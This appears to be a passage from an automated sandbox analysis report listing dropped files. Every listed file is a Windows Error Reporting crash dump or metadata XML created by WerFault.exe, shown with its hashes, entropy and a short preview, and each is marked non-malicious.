                                                SSDEEP:192:R6l7wVeJ2L6RpJW6Yrpud6ARqgmfKaWpBp89bcLqsfxAUm:R6lXJa6RpI6YrC6ARqgmfKEcLJfA
                                                MD5:ACB52C2C30AB48F1ADC24BEA30B0A2D8
                                                SHA1:03B202DEC6167710B966AFEF81BAD414D18E3031
                                                SHA-256:EA9BDB1A58F16FCEFDF4ED03BD365BBA0B24B6D4E0CB023958FED124A6DBF5E1
                                                SHA-512:F72049E26AC0E8D2A59036C2A2D6A196B8C0326548EDBFFB691C62AF44AD13122D5C7C4F2B86183E6C5A4EE56A5704A236EB9E58962700E7EA6FF488DB8196FF
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA73.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.466974052709908
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VY2Ym8M4JStF3+q8vzk38Rqhd:uIjfxI70g7V6JMKw38Rqhd
                                                MD5:A47AEA88E628C606C0E5FC8245E5595A
                                                SHA1:BB161C6E2D260CFACFE6E8FCC275D3B1B7277F53
                                                SHA-256:9B0B1221CB562B7D8271F8464D4323C060949EDF7B006E05196ED4FEBF6545D1
                                                SHA-512:4FBF1C697713AD07C636B960310756539EC304015A82F79FB06A693183D92AE2BB6FFFF78EBC9BF5E07301C70A00A6B3134EA590758BF9C82A28CCC34A29C157
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERCFA1.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:50 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):28262
                                                Entropy (8bit):2.7107925736269802
                                                Encrypted:false
                                                SSDEEP:192:vdSjfFUXwX8PLZsQOKgTXp+u7c1/N2MMsHokpXzoore+hQ9veMNqHMWV:8b6PLaXXhiV2MM+HeF5erMq
                                                MD5:F9E59DB9C89384FD04D3AAEEFA26DA97
                                                SHA1:C3B76B754A34984C9542823EE53653F8FBBE8BB6
                                                SHA-256:F5CDA61AECF6BC09804B13BD941CE5E1573DF0007429FB082269AF18541390C9
                                                SHA-512:8433E1FD6D62F3427118A937441159C26D1BB4DDCB287E1426F3E7A8B2C0CB7830199EAF261B5EAF0F48CBCFF58EEFB23CAB5498D84E10ABF13CB7E77C60908D
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g............4...............<............"..........T.......8...........T...........P....Y......................................................................................................eJ..............GenuineIntel............T.......d......g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERD06D.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8306
                                                Entropy (8bit):3.6910649212749753
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLI6EyJ6Y2DiSU9QkHwgmft86WpDi89bVnsfZnm:R6lXJU6/6YvSU9QkQgmftqVsf0
                                                MD5:87874EFC7386AE7FB619C756552E011B
                                                SHA1:DE8ECBEF53EEC741CA5BEC5F73690500AFA697BF
                                                SHA-256:2880E7793A23E1872F7EB7056CCB13E1645D8E67DFAD56F8D8ADFE9CB899EEAA
                                                SHA-512:08A8D93841878DBBC2DB7F775EF6818E894B55AD47609EDF1C12FF67A33480340B7498A5FF2FC8FB0CC9F6C49415BC34FB1CF9BE61DE5C5A0B1C38C9B4B2A6C4
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.9.6.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERD09B.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:50 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):67656
                                                Entropy (8bit):2.1351800656082194
                                                Encrypted:false
                                                SSDEEP:384:yiG0ZdbtgncxWjRbp++j2Mh0oc4krtUKo:PpHbtgnzN3j2MqrtUK
                                                MD5:AAA6601E8E583893D0D602A3664CDB69
                                                SHA1:40F62966A8FC40C1D1CFD3B2E34FB5A81723A1DA
                                                SHA-256:4844086A5FC11E77EF7F6773AE5304BB9AC3101325FAB4D7196449C628224E07
                                                SHA-512:C7A2475CBD8219701D0F37D216A722E53623225261D4DA59070172C57D2DBA485CEBE4F17ED454E42DC96F7301C527495CC662BE478FF1BA73EE1DFEECC48517
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g............$...............,............4..........T.......8...........T...............x.......................................................................................................eJ......l.......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERD0AD.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4579
                                                Entropy (8bit):4.439318769261094
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYIPYm8M4JSGFv+q8U28RqFd:uIjfxI70g7VkJL48RqFd
                                                MD5:7444D6B99CDBCE523120AED125E3CB64
                                                SHA1:987F1BC28927B1AEE9C76DF3E8403BC223BF9F64
                                                SHA-256:741EA4DD1738E81755BB47F49297A037E1D24455B79E4A3BD88EE631E0039BB2
                                                SHA-512:B9EC0C6A1CD16FE20199707816BF447C58E99757D626F40C3EE144B5D4D559E205E7369D024DE9E15375DFB3FB7DE47681E92FB417CE3B27F1E056AE45313970
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERD186.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8396
                                                Entropy (8bit):3.696380059066445
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJ2E66s86Yrpu46ARqgmfKaWpB089bVLqsfNfnm:R6lXJl66s86Yrn6ARqgmfKTVLJfNO
                                                MD5:613E7BA596EDB3419AE83DBE2537EB63
                                                SHA1:79BCB5BAB9A014F9CF19F1C9060B482FF2B24CDC
                                                SHA-256:436760E8438696E9A9F36CF923011003A6F9B8DD25895D7C1B170D8EBD71BE81
                                                SHA-512:D0701EA35F3804AC5277AE3ED1BBA6D60519BEF6F9B15D1C39E12D65A0894542D7C92E5EC3BDB44F49E5BF61B6ABB2A9E2FED3D9AAE68218DAA4B6D0D07A494A
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1F5.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.467885070991706
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYrEYm8M4JStFSe+q8vzk38Rqhd:uIjfxI70g7VAxJfeKw38Rqhd
                                                MD5:716EAAAAABB677ED52ED9A732BC10E8E
                                                SHA1:47E28B7454A6503EE1BE8D95068DFAEC0F39D954
                                                SHA-256:968326C5D49EAC419311A0FD9B4B29F744CCA67607E7675837E75F7DAFA64D57
                                                SHA-512:22FAE5F6A2F48818E891E4773A27892E6D2F79B83B4BCFB4C4397891D23072FAE3EDEF93171AF5A6835EC30751C82313DA2305628919A8C4BEA2313670D3075B
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERD4D1.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:51 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):66928
                                                Entropy (8bit):2.1578375535411753
                                                Encrypted:false
                                                SSDEEP:192:unF2c7XYbXQZdw8n4KQOmgtgQ3W7ccg+ZxjLmLznXSFPTDo1pN2Mh1HokpSotp1E:N0ZdNvntgQZ2xWf++j2Mh0ucg+nD
                                                MD5:D24060EF7714270F46E40A7C102BFF03
                                                SHA1:8E4A6695ACCCD87AF4F94B46B0D9AEE171AD4F43
                                                SHA-256:C847D8A5C73D087FE11B454941EAD27AA93CB02BBC884CDD4AB1CBC0F6D5041C
                                                SHA-512:E936E6295399C0EAF65782DE6A66A7076DF591D6B983C56F8CDECF1F7A4822461139EF169D456B11173ADA8C7154E899A4D4FF43FAA71F6B931171AD06210AD1
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g............$...............,............4..........T.......8...........T.......................................................................................................................eJ......l.......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERD59D.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):6392
                                                Entropy (8bit):3.720239905491603
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJ2g6mJNYKaWpBy89bMLqsfo8km:R6lXJR6mJNYKJMLJfN
                                                MD5:6B3D41908A3A05385CAD9F2727834359
                                                SHA1:82F60602B8036370BDCA53CB6566E302538301F4
                                                SHA-256:E3DB791C44F4FABE844DCEB6E28716051D93A6BF0FA9D766DB87F10A165BD162
                                                SHA-512:96420E464911F65E8169A10092D5211425DA01B163A86145384ACBFB72C72D9F8262C9ABB2FDEEBBDC6812DF43F60CBFEDADCAEAD183BE0AD5A5DA990D5CA67D
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERD5DD.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.4687041049551235
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VY6mYm8M4JStFB+q8vzk38Rqhd:uIjfxI70g7VhJOKw38Rqhd
                                                MD5:E8FF3935104B1C8326A8D13891BE1F26
                                                SHA1:6BCFC15DA61CA01893C9C4CCD0E293EF1CC579C7
                                                SHA-256:4C6260F00B630E61A9392E2FFA03E47EC0CB81CD4B42FF14DE3220483EBC52B6
                                                SHA-512:68ACE87AF8BCFC2AE6FA8D1A4F918D9236F764A932558D074A29ADF21530C13B1EBC5EFDB1D89CACAAA0472E30917AE8BAD38F38BA366F5125968775F3EA5D6F
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERDACC.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:53 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):72620
                                                Entropy (8bit):2.0899037979926294
                                                Encrypted:false
                                                SSDEEP:192:UYuUBEX0XARNNy4kjOmgtgi3W7Ufa2rIxjLNLibgnXSiTDo1pN2Mh1HokpSotp1t:F+RNZZtgiJffsx99F+j2Mh0C9Ag1
                                                MD5:4D6DE88A86B26396681DF005FBC08F28
                                                SHA1:F25F1ED65085AB447AF29749A69F2A6965A08E4D
                                                SHA-256:B7BF24725C91A422101196B836078D52646F35D58FB4336FB0BDA59F4C1EF246
                                                SHA-512:90DF7145B60F7E414CFD36FBC25B11D2D5F50EA8D4EAE058B0B8AF4E008B2DF19C25DE4E917DD38EB672ED56DC1F21BDDE6A444D81A510ECCE3D9C2F595DE39A
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g............T...............\............7..........T.......8...........T...........H...d.......................................................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB89.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):6392
                                                Entropy (8bit):3.718800974940306
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJ256wNJwtYaaAjArWpBT89b+LqsfCKm:R6lXJY6wNqtYaaAjAB+LJfm
                                                MD5:31A1FECFDEBA5CF5571A0D8960C620F8
                                                SHA1:182D7292FF4A847DD296FCC2F3A675B835F52D93
                                                SHA-256:5068F23D4BA6CD3C35655564AAD623EE60C94216DF78CE264A4858651F7A84CB
                                                SHA-512:1C46F3F5BE8139FEFEABFD0AA02201FE8C9FD64C86D4C61C21C8C3F59FBAAA8F1C7625CDC0DD150C4D0CB6F8E0DE4C987FC763E976AD64DFB2037FD9C354A415
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBA9.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.465384372208263
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VY9Ym8M4JSFFv+q8vzM38Rqhd:uIjfxI70g7VVJYKI38Rqhd
                                                MD5:0E8570DED1869A5AB0CC995D5F7909E9
                                                SHA1:25634D8512420730BC485C7301B1CC75F059A4A4
                                                SHA-256:A76359A013A9E4AC6B36CE07458F7E980575E19445E6EC9679D7AA3B4252EA21
                                                SHA-512:772577D71892D63DFD9FC8EAE80C67B2A17C1D2DBAEB7560B08AEF87AB096AB5C1724D0C13402EE1ADCF08D524F0B6B12839A75BEF1D93AFA0A7A788CCB5E163
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERDEC4.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:54 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):67026
                                                Entropy (8bit):2.157780821270462
                                                Encrypted:false
                                                SSDEEP:192:78F2c7XYbXQZd5QOmgtgOK3WExjLNLWnVynTadhnXSiTDo1pN2Mh1HokpSotp1W0:90ZddtgOKHx9HoF+j2Mh0uCga/snD
                                                MD5:B3622070103458266AC71D090EE5A53A
                                                SHA1:C0FE37F01641DCF4E0E2BACFFFC714C93176B88A
                                                SHA-256:12F8FBB745007A388BF5D5A47E58F1A261045AA5A51F96EC81064ECB3C896FD4
                                                SHA-512:3D8355C68C38E40E89D015D69E3D0275BD6AA6D1294D6A851D2B0F6F0D291909A9A4ACA0ACD9D78E3330DE0B0763D639FC0B866996D73F849BA299326845EF26
                                                Malicious:false
